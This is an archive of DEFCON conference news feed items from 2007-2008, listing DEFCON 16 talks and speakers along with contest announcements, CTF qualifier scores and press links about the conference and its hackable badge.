How can I pwn thee? Let me count the ways - Renderman
Hijacking the Outdoor Digital Billboard Network - Tottenkoph, Rev
You can discuss the speakers and talks on the DEFCON Forums at: https://forum.defcon.org/showthread.php?t=9496

==> DEFCONBots is Back!

https://www.defcon.org/defconrss.xml DefconBots is back this year with the same rules as last year. Now is a great time to get started on your bot! Last year there were six competitors, this year let's get a lot more! Don't let "I can't solder" stop you again, you can get started with a simple kit available through http://defconbots.org There's even open source software to get you started in linux.

==> New DEFCON 16 Speakers Posted!

https://www.defcon.org/defconrss.xml 9 more talks have been added to the DEFCON 16 lineup, and are listed below, alpha by speaker:
Digital Security: a Risky Business - Ian O. Angell
Pen-Testing is Dead, Long Live the Pen Test - Taylor Banks
Hacking the Bionic Man - Gadi Evron
Panel: Internet Wars 2008 - Gadi Evron (Moderator)
The Big Picture: Digital Cinema Technology and Security - Mike Renlund
Inducing Momentary Faults Within Secure Smartcards / Microcontrollers - Christopher Tarnovsky
MetaPost-Exploitation - Valsmith, Colin Ames
Password Cracking on a Budget - Matt Weir, Sudhir Aggarwal
New ideas for old practices - Port-Scanning improved - Fabian "fabs" Yamaguchi, FX

==> DEFCON 16 Artwork Contest Extended!

https://www.defcon.org/defconrss.xml Due to late blooming interest in the contest, all entries for the DEFCON 16 Artwork Contest will be accepted up until 5pm PST on Sunday June 22, 2008. You can find the rules at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Voting for the People's Choice category will commence Monday June 23, 2008 and will run for one week on pics.defcon.org. A link to the voting gallery and instructions will follow at that time. You will need a DEFCON Pics account to vote, so if you don't have one, sign up now! Good luck all!

==> Defcon Goon: Speaker Operations: Call for Volunteers

https://www.defcon.org/defconrss.xml From Agent X on the DEFCON Forums: The few, the proud (arrogant?), the insane? Yes, that's right, Speaker Operations, a subset of the Defcon Goon Squad, is looking for a few good folks. Speaker Operations goons are the blue shirts that ferry speakers to and from stage, keep the speaking schedule in order, and generally try to make the talks not suck... Sometimes we succeed, sometimes we fail, generally there is beer at the end. In an effort to ensure a healthy supply of goons for future Defcons, I'm holding semi-formal auditions/interviews this year at Defcon 16. So if you're interested in joining the ranks of the Defcon Speaker Operations Goons squad, here's what you've got to do:
* Write me an email, telling me why you will rock speaker operations. (In a good way).
* Demonstrate your resourcefulness by tracking me down and arranging a time for us to talk at Defcon this year. Make it memorable...it's a busy con you know.
* Demonstrate to the speaker operations staff those blue shirted goons again, you know why they are so awesome (?!Schwag, beer?!)
Thank you for your interest. Agent X https://forum.defcon.org/showthread.php?t=9474

==> Open CTF Registration is now Open!

https://www.defcon.org/defconrss.xml Formerly known as Amateur Capture The Flag (aCTF), this contest pits any Defcon attendee against the house (DC949) as well as other contestants. There are a series of challenges of varying difficulty involving a variety of things, including cryptology, stenography, malicious software, and websites (and other services) just waiting to be exploited. Find out more at: http://dc949.org/oCTFIV/

==> Movie Night with the Dark Tangent

https://www.defcon.org/defconrss.xml This year on Friday night we will be screening a documentary, Hackers Are People Too, which will end before the director/producer needs to participate in Hacker Jeopardy. Then we will move on to some Blu-Ray goodness of "Appleseed Ex-Machina" for the latest in cg anime from Japan. Saturday evening we will go retro with "Three Days of the Condor", where you can see an early Robert Redford deal with spies, telephones, and intrigue. For those who have seen 'safehouse' you'll recognize a scene for scene rip off homage to "Condor". Then we'll close with as of yet TBD movie...

==> Qualifying CTF Teams for DEFCON 16

https://www.defcon.org/defconrss.xml The following teams have demonstrated their uber prowess by qualifying to participate in the DEFCON 16 Capture the Flag Contest, organized by Kenshoto. These 7 teams will be battling last year's winners, 1@stPlace, for the CTF title! DEFCON would like to congratulate all of these talented teams and wish them luck!
Routards (5200): Trivia 1500, Binary Leetness 1000, Forensics 1500, Real World 600, Potent Pwnables 600
Pandas with Gambas (5200): Trivia 1500, Binary Leetness 1000, Forensics 1500, Potent Pwnables 600, Real World 600
Guard@MyLan0 (4800): Trivia 1500, Binary Leetness 600, Forensics 1500, Potent Pwnables 600, Real World 600
Shellphish (4800): Trivia 1500, Binary Leetness 600, Forensics 1500, Potent Pwnables 600, Real World 600
Taekwon-V (4800): Trivia 1500, Binary Leetness 600, Forensics 1500, Potent Pwnables 600, Real World 600
WOWHACKER (4800): Trivia 1500, Binary Leetness 600, Forensics 1500, Potent Pwnables 600, Real World 600
PLUS (4800): Trivia 1500, Binary Leetness 600, Forensics 1500, Potent Pwnables 600, Real World 600

==> Mystery Challenge Registration Closing Soon!

https://www.defcon.org/defconrss.xml The LosT@Con Mystery Challenge preregistration will remain open for an undisclosed bit longer. Teams who have not completed the preregistration but that intend to enter are encouraged to post such intentions in the DC forums. This year there will be one wildcard slot open, and a mini-contest will be held two hours prior to the official contest start for that slot. https://forum.defcon.org/forumdisplay.php?f=369

==> Sign up for Hacker Jeopardy and Buzzword Survivor!

https://www.defcon.org/defconrss.xml Hacker Jeopardy The Official Hacker Jeopardy entry thread on the DEFCON Forums is now open for signup, at https://forum.defcon.org/showthread.php?t=9444 From the signup thread: This year, we will be accepting applications from both teams and individuals. We will likely hold a set of qualifying games Friday afternoon to allow unproven teams/people a chance to show off their skillz and advance into the late night tournament. Buzzword Survivor - NEW! Buzzword Survivor is a new contest that pits you against 36 hours of vendor pitches, with big cash prizes! Find out what it's all about and sign up at https://forum.defcon.org/forumdisplay.php?f=352

==> DEFCON 16 Artwork Contest Reminder

https://www.defcon.org/defconrss.xml There's only a little over a week left to submit your creations for the DEFCON 16 Artwork Contest. The Contest info and rules can be found at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Current submissions are on https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770

==> Another Round of DEFCON 16 Speakers are Live!

https://www.defcon.org/defconrss.xml We've got more talks up on the speaker page, listed below, alpha by speaker:
BackTrack Foo - From bug to 0day - Mati Aharoni
They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention - Jay Beale
Arbitrary code injecting MITM attack vectors - Joachim De Zutter "byterage"
Wide World WAF's - Ben Feinstein
Virtually Hacking - John Fitzpatrick
Malware RCE: Debuggers and Decryptor Development - Michael Ligh
Fear, Uncertainty and the Digital Armageddon - Morgan Marquise-Boire
Toasterkit, a Modular NetBSD Rootkit - Anthony Martinez, Thomas Bowen
Bringing Sexy Back: Breaking in with Style - David Maynor, Robert Graham
Panel: All Your Sploits (and Servers) Are Belong To Us: Vulnerabilities Don't Matter (And Neither Does Your Security) - David Mortman, Rich Mogull, Chris Hoff, Robert "RSnake" Hansen, Robert Graham, David Maynor
Solid Stated Drives Destroy Forensic & Data Recovery Jobs: Animated! - Scott Moulton
Urban Exploration - A Hacker's View - Phreakmonkey
Beholder: New wifi monitor tool - Nelson Murilo, Luiz 'effffn' Eduardo
Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly - Vic Vandal
RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife - David Weston, Tiller Beauchamp
https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> Gringo Warrior at DEFCON 16 NEW!

https://www.defcon.org/defconrss.xml Participants in Gringo Warrior will have five minutes to free themselves from handcuffs, escape from their "cell", get past a guard, retrieve their passport from a locked filing cabinet, leave through another locked door, and make their escape to freedom. The course will offer a variety of locks representing a range of difficulty, allowing participation by people of all skill levels. Points will be awarded based on the time of completion as well as the difficulty of locks attempted. The best warrior of all wins the grand prize! Get the full story at: https://forum.defcon.org/showthread.php?t=9401

==> DEFCON 16 now has a Twitter Feed!

https://www.defcon.org/defconrss.xml DEFCON 16 Now has a Twitter Feed for all you Tweeters out there! Frequent updates will be forthcoming up to and during the con to keep you in the loop for news, contest updates and events. http://www.twitter.com/defcon16

==> DEFCON 16 CTF Quals Complete

https://www.defcon.org/defconrss.xml From Kenshoto.com: See the final results at http://www.kenshoto.com/results.txt! The first 7 teams on the list have qualified. If any are unable to attend, invitations will be extended to the alternates in scoring order.

==> DEFCON 16 Slogan Contest Now Open

https://www.defcon.org/defconrss.xml Do you think you have the wordsmithing skills to come up with the next great DEFCON slogan? The DEFCON 16 Slogan Contest is now up and running, so get on over to http://www.totallybog.us/dc16slogan/dc16slogan.html and submit your literary gems for a chance to be featured in the DEFCON 16 Program!

==> More DEFCON 16 Speakers Online!

https://www.defcon.org/defconrss.xml
Working with Law Enforcement - Don M. Blumenthal
CSRF Bouncing - Michael Brooks
Hacking Desire - Ian Clark
Compromising Windows Based Internet Kiosks - Paul Craig
Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key - Thomas d'Otreppe de Bouvette "Mister_X", Rick Farina "Zero_Chaos"
Snort Plug-in Development: Teaching an Old Pig New Tricks - Ben Feinstein
Playing with Web Application Firewalls - Wendel Guglielmetti Henrique
Advanced Software Armoring and Polymorphic Kung Fu - Nick Harbour
Under the iHood - Cameron Hotchkies
Tuning Your Brain. - Lyn
Forensics is ONLY for Private Investigators - Scott Moulton
Every Breath You Take - Jim O'Leary
Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving, Or, Techniques of Industrial Espionage - Eric Schmiedl
Gaming - The Next Overlooked Security Hole - Ferdinand Schober
Making a Text Adventure Documentary - Jason Scott
StegoFS - James Shewmaker
Let's Sink the Phishermen's Boat! - Teo Sze Siong, Hirosh Joseph
Medical Identity Theft - Eric Smith, Dr. Shana Dardan
Web Privacy and Flash Local Shared Objects - Clinton Wong

==> Beverage Cooling Contraption Contest on Hack A Day!

https://www.defcon.org/defconrss.xml The BCCC run by Deviant Ollam has popped up on hackaday.com! From the article: Let's face it: no one likes warm beer. In the arid August air of Las Vegas, though, it's difficult to get anything else. To combat this problem, Deviant has hosted a competition the last three years at Defcon called the Beverage Cooling Contraption Contest, or BCCC. We're not talking about something as simple as a Coleman cooler or even a peltier cooler: the devices entered in this contest have to be able to take a beer from hot to cool and your glass within minutes. For info on the contest, go to: http://www.deviating.net/bccc

==> Round two of DEFCON 16 speaker selections!

https://www.defcon.org/defconrss.xml The selection process continues, and the second batch of talks for DEFCON 16 is now on the speaker page. They are listed below, alpha by speaker! Check 'em out!
Autoimmunity disorder in Wireless LAN - Md Sohail Ahmad, JVR Murthy, Amit Vartak
The Anatomy of a Subway Hack: Breaking Crypto RFID's and Magstripes of Ticketing Systems - Zack Anderson, RJ Ryan, Alessandro Chiesa
Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How - Luciano Bello, Maximiliano Betacchini
Buying Time- What is your Data Worth? (A generalized Solution to distributed Brute Force attacks) - Adam Bregenzer
ModScan: A SCADA MODBUS Network Scanner - Mark Bristow
Deciphering Captcha - Michael Brooks
Hacking Data Retention: Small Sister your digital privacy self defense - Brenno De Winter
Markets for Malware: A structural Economic Approach - Brian K. Edwards, Silvio J. Flaim
Identification Card Security: Past, Present, Future - Doug Farre
VLANs Layer 2 Attacks: Their Relevance and their Kryptonite - Kevin Figueroa, Marco Figueroa, Anthony L. Williams
Journey to the center of the HP28 - Travis Goodspeed
Nail the Coffin Shut, NTLM is Dead - Kurt Grutzmacher
Race-2-Zero Unpacked - Simon Howard
Triad-Based Music Steganography - Adrian Johnson
Panel: Black vs. White: The complete life cycle of a real world breach - David Kennedy, Ken Stasiak, Scott White, John Melvin, Andrew Weidenhamer
Demonstration of Hardware Trojans - Fouad Kiamilev, Ryan Hoover
WhiteSpace: A Different Approach to JavaScript Obfuscation - Kolisar
Flux on: EAS (Emergency Alert System) - Matt "DCFLuX" Krick
Taking Back your Cellphone - Alexander Lash
Feed my Sat Monkey - Major Malfunction
Sniffing Cable Modems - Guy Martin
The World of Pager Sniffing/Interception: More Activity than one may suspect - NYCMIKE
New Tool for SQL Injection with DNS Exfiltration - Robert Ricks
Free Anonymous Internet Using Modified Cable Modems - Blake Self, Durandal
Evade IDS/IPS Systems using Geospatial Threat Detection - Ryan Trost
The Death Envelope: A Medieval Solution to a 21st Century Problem - Matt Yoder

==> First round of DEFCON 16 speakers selected!

https://www.defcon.org/defconrss.xml The first round of speakers has been selected for DEFCON 16, and it looks like we have a great lineup going! The selection process is coming along nicely and we should have the next batch of speakers online by the middle of next week. Here are the titles and speakers for the talks so far, alpha by speaker:
Time-Based Blind SQL Injection using heavy queries: A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool - Chema Alonso, José Parada
VulnCatcher: Fun with Vtrace and Programmatic Debugging - atlas
Owning the Users with Agent in the Middle - Jay Beale
The emergence (and use) of Open Source Warfare - Peter Berghammer
What To Do When Your Data Winds Up Where It Shouldn't - Don Blumenthal
Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol - Magnus Bråding
Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software) - Jonathan Brossard
Building a Real Session Layer - D.J. Capelis
Hacking E.S.P. - Joe Cicero, Michael Vieau
Climbing Everest: An Insider's Look at one state's Voting Systems - Sandy Clark "Mouse"
Could Googling Take Down a President, a Prime Minister, or an Average Citizen? - Greg Conti
Next Generation Collaborative Reversing with Ida Pro and CollabREate - Chris Eagle, Tim Vidas
Ask EFF: The Year in Digital Civil Liberties Panel - Kevin Bankston, Eva Galperin, Jennifer Granick, Marcia Hofmann, Corynne McSherry, Kurt Opsahl
Panel: Hacking in the Name of Science - Tadayoshi Kohno, Jon Callas, Alexei Czeskis, Dan Halperin, Karl Koscher
de-Tor-iorate Anonymity - Nathan Evans, Christian Grothoff
Nmap: Scanning the Internet - Fyodor
BSODomizer - Joe "Kingpin" Grand, Zoz
Satan is on my Friends list: Attacking Social Networks - Nathan Hamiel, Shawn Moyer
A Hacker Looks at 50 - G. Mark Hardy
War Ballooning-Kismet Wireless "Eye in the Sky" - Rick Hill
The Death of Cash: The loss of anonymity and other dangers of the cash free society - Tony Howlett
Intercepting Mobile Phone/GSM Traffic - David Hulton, "Skyper"
Ham For Hackers - Take Back the Airwaves - JonM
Career Mythbusters: Separating Fact from Fiction in your Information Security Career - Lee Kushner, Mike Murray
Developments in Cisco IOS Forensics - "FX" Felix Lindner
Good Viruses. Evaluating the Risks - Dr. Igor Muttik
Brain Games: Make your own Biofeedback Video Game - Ne0nRain, Joe "Kingpin" Grand
VoIPER: Smashing the VoIP stack while you sleep - N.N.P.
Hacking OpenVMS - Christer Öberg, Claes Nyberg, James Tusini
365-Day: Active Https Cookie Hijacking - Mike Perry
Malware Detection through Network Flow Analysis - Bruce Potter
The true story of the Radioactive Boyscout: The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb - Paul F. Renda
CAPTCHAs: Are they really hopeless? (Yes) - Mike Spindel, Scott Torborg
Living in the RIA World - Alex Stamos, David Thiel, Justine Osborne
Xploiting Google Gadgets: Gmalware and Beyond - Tom "strace" Stracener, Robert "Rsnake" Hansen
TBA - Marc Weber Tobias
How to make Friends & Influence Lock Manufacturers - Schuyler Towne, Jon King
Compliance: The Enterprise Vulnerability Roadmap - Weasel
Mobile Hacker Space - Thomas Wilhelm
To read more about these talks, go to the speaker page at http://www.defcon.org/html/defcon-16/dc-16-speakers.html!

==> First Submissions in for DEFCON 16 Artwork Contest

https://www.defcon.org/defconrss.xml You can check out the first few submissions to the Artwork Contest on pics.defcon.org at this URL: https://pics.defcon.org/showgallery.php?cat=532

==> Call for Papers Closed/Speaker Selection has begun!

https://www.defcon.org/defconrss.xml The time has come to close the DEFCON 16 CFP. Speaker Selection is now underway, and updates to the Speaker list will be frequent as they are chosen. Keep your eyes on the speaker page, the schedule page, and subscribe to the RSS Feed to stay apprised of speaker announcements as they occur! Speaker Page: https://www.defcon.org/html/defcon-16/dc-16-speakers.html Schedule Page: https://www.defcon.org/html/defcon-16/dc-16-schedule.html RSS Feed: https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> DEFCON 16 CFP Open through the weekend!

https://www.defcon.org/defconrss.xml For all you last minute stragglers and super busy folks, we are keeping the Call for Papers open through Monday the 19th. Get on it and send that submission to talks at defcon dot org! https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html

==> Mystery Challenge Registration Challenge Open!

https://www.defcon.org/defconrss.xml LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at https://forum.defcon.org/showthread.php?t=9357. What is the Mystery Challenge you may ask...? From mysterychallenge.org The mystery challenge is just that- a mystery. Details of the contest are not given until the contest starts. So take the dare, and enter a contest where you are flying blind. So you heard about the challenge, and think you can compete? Search for hints and clues carefully, even prior to Defcon. Suggested Skillset for success: -Physical security (Lockpicking, literal hacking, etc) -Electronics (reading schematics, breadboard prototyping, etc) -Puzzle and Riddle Skills -Coding, networking, hacking... -???

==> Call for Papers Closing Soon

https://www.defcon.org/defconrss.xml You've only got a few days left to submit your groundbreaking research to the DEFCON Call for Papers. Go to https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html and get your submission in for the chance to give a talk at DEFCON 16!

==> DEFCON 16 Capture the Flag Qualification Announcement

https://www.defcon.org/defconrss.xml Kenshoto will be back this year bringing all out cyber-warfare to DEFCON 16. The qualification round for this year's Capture the Flag contest has been officially announced. From the DEFCON Forums: Deputy Director of Homeland Security, Dr. Kenneth Shoto today announces a call to cyber-ninjas everywhere to sign up for his annual fight-to-the-death qualifying competition for the Defcon Capture the Flag (CtF) contest. The qualifying competition will start at 10PM on Friday, May 30th and end at 10PM on Sunday, June 1st. Find out more at https://forum.defcon.org/showthread.php?t=9352 or http://kenshoto.allyourboxarebelongto.us:1337/

==> Race to Zero and Dan Kaminsky on CBC Radio

https://www.defcon.org/defconrss.xml The buzz concerning the new unofficial Race to Zero Contest at DEFCON 16 just keeps on building. Dan Kaminsky provides his thoughts on the mounting controversy in an interview with Search Engine, a Canadian public radio program. Check it out here: http://podcast.cbc.ca/mp3/searchengine_20080508_5692.mp3

==> pics.defcon.org is Back!

https://www.defcon.org/defconrss.xml After a hiatus due to an XSS vulnerability, the DEFCON pics site is back up and running! Don't hesitate to head on over and upload your favorite photos and videos from past DEFCON conventions!

==> Race to Zero Makes Headlines

https://www.defcon.org/defconrss.xml The Race-to-Zero anti-virus challenge was announced scarcely a week ago, and already the controversy surrounding it has bubbled all the way up to Wired. The contest's basic premise is that competitors will be given sample virus code and rewarded for modifying that code in such a way that it defeats common AV products. AV vendors have made their discomfort with the idea clear, with various spokesmen for the industry voicing concern about the creation of new threats to existing AV products. Contest organizers have countered that the contest is categorically not about creating new virii; rather, it is about demonstrating the speed with which currently blocked virii can be modified to defeat current virus-blocking software. It's important to note that while the contest will be happening at this year's DEFCON, it is not an official DEFCON contest. To learn about the contest from its creators and organizers, please check their website at www.racetozero.net. Links: http://www.racetozero.net/ http://blog.wired.com/27bstroke6/2008/04/hacker-challenge.html http://www.infoworld.com/article/08/04/28/Security-vendors-slam-Defcon-virus-contest_1.html Go to https://forum.defcon.org/forumdisplay.php?f=419 to chime in on the controversy.

==> DEFCON 16 Artwork Contest Call for Submissions

https://www.defcon.org/defconrss.xml Whip out your favorite medium and get to creating, because the official DEFCON 16 Art Contest is now underway! This year's contest is a bit different from previous years, and will run from now to June 15, 2008. Go to http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

==> New Contest! The Race to Zero

https://www.defcon.org/defconrss.xml Check out this new contest brewing for DEFCON 16! From the DEFCON Forums: The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/

==> DEFCON 16 Black & White Ball Call for Talent

https://www.defcon.org/defconrss.xml This is the official CALL FOR TALENT: This year the ballroom will lead a double life. By day, the room will be a chillout/breakout room complete with wifi. By night, the room will transform into the Black and White Ball, complete with dance floor, lights, headlining acts and a bar. We are currently taking all submissions for DJs/acts for the chillout/breakout room, and have a few slots for the Black and White Ball. Some of the styles we are looking for are: drum n bass, trance, breaks, electro, industrial. If you are interested in performing, please contact: blackandwhitedjs@gmail.com

==> DEFCON 16 Call for Papers Now Open!

https://www.defcon.org/defconrss.xml That's right! It's time again to submit your hacktastic discoveries to be considered as a DEFCON 16 talk! New and interesting research is always welcomed in the realm of security, hardware hacking, social engineering, lockpicking, and anything else you can modify, bypass or reverse engineer. Out of the box thinking is what we're after... Go to the CFP form and submit!

==> DEFCON 15 [Video] Podcast now online.

https://www.defcon.org/defconrss.xml The Defcon 15 Video Podcast is now online. If you didn't make it, or missed the speaker you wanted to see, here is your chance to download and watch the presentations any time. http://www.defcon.org/podcast/defcon-15-video.rss Supporting materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> DEFCON 15 [Audio] Podcast now online

https://www.defcon.org/defconrss.xml The Defcon 15 Audio Podcast is now online. If you didn't make it, or missed the speaker you wanted to see, here is your chance to download and hear the presentations when you want. http://www.defcon.org/podcast/defcon-15-audio.rss Supporting materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> Tiger Team with Pyr0, long time DEF CON Goon(tm)

https://www.defcon.org/defconrss.xml Tiger Team is a new series on TruTV (formerly CourtTV) featuring a familiar face from DEFCON, Luke McOmie aka pyr0. From Wikipedia: The show follows a "tiger team" of Chris Nickerson, Luke McOmie, and Ryan Jones, which is hired to infiltrate organizations with the objective of testing their weaknesses to electronic, psychological, tactical, and physical threats. Attacks executed on organizations in this television show include social engineering, wired and wireless hacking, and physically breaking into buildings. The television show's first two episodes aired Tuesday, December 25, 2007 at 11:00 pm ET and 11:30 pm ET. The first episode is available on TruTV's website in streaming Flash format. TruTV Feedback: http://www.trutv.com/contact/feedbackform.asp?amp;subject_id=148&start=true

==> Join the DEFCON LinkedIn Group

https://www.defcon.org/defconrss.xml Join the DEFCON LinkedIn Group! We have created a DEF CON group on LinkedIn. If you already have an account at LinkedIn, please join us. We don't collect email addresses, so there is no easy way to pre-approve people; just use the following link to request membership. http://www.linkedin.com/e/gis/47798/109B061719DC

==> Pre-DEFCON 16

https://www.defcon.org/defconrss.xml It's beginning already... Check out the Pre-DEFCON 16 Discussions in the DEFCON Forums. If you want to get involved, start here!

==> DT Speaks Out On the "To Catch a Hacker" Scandal

https://www.defcon.org/defconrss.xml The media storm that followed the NBC producer fleeing DEFCON included a lot of opinions, but none of them came from the DEFCON staff itself. DT recently contributed a piece to the Thinkernet blog at InternetEvolution.com. It's an interesting piece about the significance of the event and some of the lessons that the media can take from all the hoopla.

==> DEFCON FORUMS now support user blogs

https://www.defcon.org/defconrss.xml The DEFCON forums (forum.defcon.org) now support projects and blogs. We have licensed the blog tool (http://www.vbulletin.com/features_blog.php), and anyone with a forum account can now create a blog. We'll be doing more with this in the future, but for now we are encouraging people to create accounts and play with it. If it works we'll keep it; if not, we'll look for other software to try. We've also licensed Project Tools (http://www.vbulletin.com/features_project.php) that everyone can use to plan DC Groups projects, events at the con, or their latest hacking project. If you're a forum member, we hope you'll take a little time to try out the new features. If you're not, here's hoping this helps you decide to join us.

==> DEFCON 15 Badge finalist in Design Challenge

https://www.defcon.org/defconrss.xml The Defcon 15 badge is a finalist in the Freescale Semiconductor Black Widow $10,000 Design Challenge. Freescale selected the ten finalists from a field of more than 775 participants. Each submission was judged on creativity, design efficiency, technical complexity, number of Freescale devices used, and overall application innovation and usefulness.

==> Photos of DC 15 Badge Hacks

https://www.defcon.org/defconrss.xml Check out these photos of the badge hacking and final hacks at DEFCON 15. For badge source code, video of the hacks, and source of selected hacks, check out Joe Grand's badge page at: http://www.grandideastudio.com/portfolio/index.php?amp;id=1&prod=54

==> DEFCON Network Survival Guide

https://www.defcon.org/defconrss.xml It's a little late, but it's never too early to start planning for next year. If you must get online at DEFCON, here's a little guide to help keep you from getting completely owned. From The Register: "..Defcon, the most bacchanal of security conferences and perhaps the single largest gathering of technically adept pranksters. Now is the perfect time to map out a strategy for keeping emails private and making sure your system doesn't get ransacked by the scowling kid with the nose ring and jet-black hair."

==> The Traveling Terabyte Project

https://www.defcon.org/defconrss.xml Many of you know Deviant Ollam from his extensive involvement in the Lockpick Village and his running of the Beverage Cooling Contest, as well as his new "Titanium Chef" and "Guess the Flesh" contests at the Toxic BBQ this year. We came across a story about one of his projects and thought we'd share. From tgdaily.com: A New Jersey network engineer is on a mission to send some love and care of the digital kind to Americans stationed overseas. Going by his hacker handle Deviant Ollam, he's been sending out hard drives filled with popular movies, television shows and music for over a year. Dubbed the Traveling Terabyte Project (TTB), the drives have seen action in war-torn countries and one set is now making a small contingent of Marines very happy in the former Soviet republic of Tajikistan. Photos at: http://www.tgdaily.com/index.php?option=com_content&task=blogsection&id=18&Itemid=41&slideshow=20070920

==> Kingpin: far from soft, reprezentin' l0pht.

https://www.defcon.org/defconrss.xml This little slice of gangsta was part of the winning Badge Hacking Contest submission by Team Osogato. This rap song was created by The Brothers Grimm and based on Kingpin's "Ode to the DEFCON 15 Badge" poem printed in the conference program. Played at the DEFCON 15 Awards Ceremony on Sunday afternoon. Thanks to Kingpin for posting this on the media server at pics.defcon.org. If you've got any pictures or media from DEFCON, please consider sharing it with the DC family at pics.defcon.org.

==> DEFCONbot video

https://www.defcon.org/defconrss.xml Ever wonder what it takes to compete in the DEFCONbot shootout? Check out some fascinating behind-the-scenes video from a team that had a sentry gun in this year's competition at the Burnt Popcorn blog. For more information about DC 15's DEFCONbots winners or data on past competitions, be sure to visit defconbots.org.

==> Call for DEFCON 15 photos

https://www.defcon.org/defconrss.xml If you have pictures of DEFCON 15 (or any previous DEFCON) you'd like to share, please upload them to https://pics.defcon.org. We're trying to create a visual record of all the shows and your help is appreciated. Just create an account and start uploading pictures and videos!

==> DEFCON media archives updated

https://www.defcon.org/defconrss.xml The DEFCON media archives have been updated with slides, white papers and extras for DEFCON 15 presentations. Come check them out, and stay tuned - we'll be adding audio and video from DEFCON 15 as soon as it's ready.

==> DEFCON In The News

https://www.defcon.org/defconrss.xml Many interesting things happened at this year's DEFCON, from the sensational hackable badge by Joe Grand to the eye-opening talk by Zac Franken on access control reader (in)security. We blew the undercover reporter's cover, and we found out that a kid can bump a "bump-proof" deadbolt. We even married two Feds. What a year! Here are just a few of the headlines arising from DEFCON 15: http://www.wired.com/politics/security/news/2007/08/medeco Medeco Readies Assembly-Line Fix for DefCon Lock Hack http://www.computerworld.com/action/article.do command=viewArticleBasic&articleId=9029080 $10 hack can unlock nearly any office door http://blog.wired.com/27bstroke6/2007/08/i-married-a-fed.html I Married a Fed at DefCon http://www.youtube.com/watch?v=nCvmkxO5hoQ Michelle Madigan Video: Dateline Reporter Uncovered At DEFCON 2007. http://weblog.infoworld.com/zeroday/archives/2007/08/defcon_diary_th.html Defcon diary: The real story

==> A Word from DEFCON 15 Badge Creator Joe Grand!

https://www.defcon.org/defconrss.xml Joe decided to drop us a line and send us some info on what's going on with the badges AFTER the con. We loved the badges this year and apparently we aren't the only ones who found them awesome. From Joe Grand: "You've probably noticed that people are still going *nuts* over the badges. That's a really awesome feeling and hopefully there will be some of the 40 people who took components and development kits coming back next year with some radical hacks. Here are some pictures I took of the Black Hat and DEFCON conferences (and badge hacking): http://www.flickr.com/photos/joesmooth/sets/72157601295119952/ and here: http://www.flickr.com/photos/joesmooth/sets/72157601302838516/ The badges have been selling like hot cakes on eBay: http://search.ebay.com/defcon-15 Take a look at the completed listings, too, to see the high bidders! Also, there were TONS of blog and news reports about the badge. You've probably read most of them, but here are the ones I liked the best: * Hack-a-Day, August 2, 2007, http://www.hackaday.com/2007/08/02/the-defcon-badge * The Register, The romance and mystery of a good hack, August 6, 2007, http://www.theregister.co.uk/2007/08/06/defcon_final/ * The Inquirer, Defcon ID badge comes with its own technical manual, August 3, 2007 http://www.theinquirer.net/default.aspx?article=41436 * boingboing, Defcon's hackable badges, August 3, 2007, http://www.boingboing.net/2007/08/03/defcons_hackable_bad.html * Wired, Threat Level, Badge Hack at DefCon, August 3, 2007 http://blog.wired.com/27bstroke6/2007/08/badge-hack-at-d.html * Makezine.com: Defcon 15 round up, August 5, 2007, http://www.makezine.com/blog/archive/2007/08/defcon_15_round_up.html * Makezine.com: Hackers on a Plane - Defcon, August 7, 2007, Http://www.makezine.com/blog/archive/2007/08/hackers_on_a_plane_defcon_1.html * Gizmodo, DefCon Badge Hacked in 10 Minutes, August 3, 2007,
http://gizmodo.com/gadgets/defcon/defcon-badge-hacked-in-10-minutes-285998.php I'll be putting up a webpage with complete badge development info, badge hacking contest results/hacks/source, etc. in the next week or so. It will be directly accessible from the main www.grandideastudio.com site for a while. Details on the winning badge hacking contest entry from Team Osogato can be found here: http://www.osogato.com/hacks This was the only entry out of seven that combined hardware and firmware modifications - they hacked the badge into a line-level meter for under $10 that used the LED matrix to display the peak audio levels of an audio signal fed into one channel of the A/D. The two capacitive touch buttons are used to adjust the input levels of the signal and there are even three shades of "greyscale" for a fading effect on the LEDs. For the icing on the cake, the team worked with The Brothers Grimm from Michigan (http://www.myspace.com/CompleteError) to create a rap song based on my poem that I wrote for the DC15 program (on page 3). What an honor! The song is freely available at the Team Osogato link above and step-by-step hack details are forthcoming. Hope you guys are recovering! Joe"

==> DEFCON 15 Supports EFF! Dunk Tank Results!

